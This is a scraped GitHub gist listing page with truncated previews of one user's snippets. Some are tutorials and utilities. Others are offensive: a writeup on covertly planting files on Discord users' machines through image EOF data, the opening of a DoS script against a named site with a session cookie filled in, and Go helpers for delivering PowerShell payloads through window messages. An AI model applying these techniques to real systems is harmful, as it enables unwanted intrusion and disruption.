
DebugView Filter Definition File v1.0
*] [W]*
[Orion]*
*] [W]*
*] [E]*
*] [H]*
*] [S]*
@Raffy27
Raffy27 / img2ascii.py
Created May 17, 2020 18:38
Simple code to transform and display an image as colored ASCII art
from colorama import init, deinit, Style, Fore
from PIL import Image
def pix2str_bw(p, charset, space):
    p *= len(charset)-1
    p //= 255
    return charset[p] + ' ' * space
def pix2str(p, char, space):
    apx = [(12,12,12), (197,15,31), (19,161,14), (193,156,0), (0,55,218), (136,23,152), (58,150,221), (204,204,204),
@Raffy27
Raffy27 / LSR.md
Last active October 4, 2023 18:10
Local Storage Reassembly - Discord

Local Storage Reassembly

General

The purpose of this writeup is to document a method that can be exploited in order to transfer files to a Discord user's Windows system, without said user's explicit consent. This method does not allow for immediate and direct execution of the file, therefore it does not qualify as an individual security vulnerability.

Technique

LSR requires an image file that will not be modified by Discord. Images that have already been compressed are not modified in any way: EOF data is not trimmed or altered. Using such an image, any file can be split into chunks that (combined with the image) don't exceed 8Mb, which is the upload limit for regular Discord accounts. These images containing EOF data can be sent to a user without being altered: the file hashes do not match, so remote caching cannot be used, and the original image has already been compressed, so no additional compression takes place. As soon as the user views the given conversation and the images load, they a

@Raffy27
Raffy27 / aireader.py
Last active October 26, 2020 19:36
ROCSC 2020 | Final Phase | aireader solution
import socket
from PIL import Image
import numpy as np
from pyzbar import pyzbar
import base64
import pytesseract
CTF_IP = '35.242.239.180'
CTF_PORT = 32303
BUFSIZE = 2048
@Raffy27
Raffy27 / JS Alapok.md
Last active November 2, 2020 14:30
Introduction, variables, data types, operators

JavaScript basics

Introduction

JavaScript is a programming language originally designed for the web environment. Programs written in it are called scripts, and they can be stored and run as text - there is no need for compilation, for example. There are several engines that run JavaScript, such as V8, on which both the Chromium browsers and Node.js are built.

Environment

From here on, the following programs/extensions will be needed:

@Raffy27
Raffy27 / JS Alapok 2.md
Last active November 10, 2020 19:19
JS Basics 2 - operations on strings and arrays, the if statement, the for loop

JavaScript basics 2

Operations on strings

Various operations can be performed on strings (variables and constants of type string) that help in transforming them. In most cases we can treat them as arrays of characters, as their name suggests.

Length

The length of a string is given by the length property:

let x = 'Kerebentelen';
console.log(x.length);
@Raffy27
Raffy27 / JunkNode.js
Created November 28, 2020 18:48
Storage-based DoS attack against PicNode x3
const axios = require('axios'),
    crypto = require('crypto');
const csrfToken = 'e4g6F63fa5VaTMse',
    cookie = 'io=nL7nTpRWQwDOFrBgAAA7; connect.sid=s%3AVQ2S5vY5mA-XY8-iIfCc6_45oORr7HIy.npEMrdSxsnN0XksRUGVx2Nuycj4h2LdaBPtaoRUNq1U',
    // I modified a few bytes, I'm not giving away my cookie after all! Yum
    payload = 7.499943 * 1024 * 1024,
    cluster = 10;
let data = {
@Raffy27
Raffy27 / Screenshot.ps1
Last active April 21, 2021 11:21
Screenshot with variable dimensions
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
    $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
    $graphics = [Drawing.Graphics]::FromImage($bmp)
    $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
    $bmp.Save($path)
    $graphics.Dispose()
    $bmp.Dispose()
@Raffy27
Raffy27 / window.go
Last active June 15, 2021 18:18
Window-related helper functions for delivering a [wmsg] PowerShell payload
package wmsg
import (
	"strings"
	"syscall"
	"unsafe"
)
const (
	WM_KEYDOWN = 0x0100
@Raffy27
Raffy27 / core.go
Last active June 15, 2021 18:33
Executing PowerShell commands using Window Messages
package wmsg
import (
	"bufio"
	"fmt"
	"log"
	"os"
	"runtime"
	"strings"
	"syscall"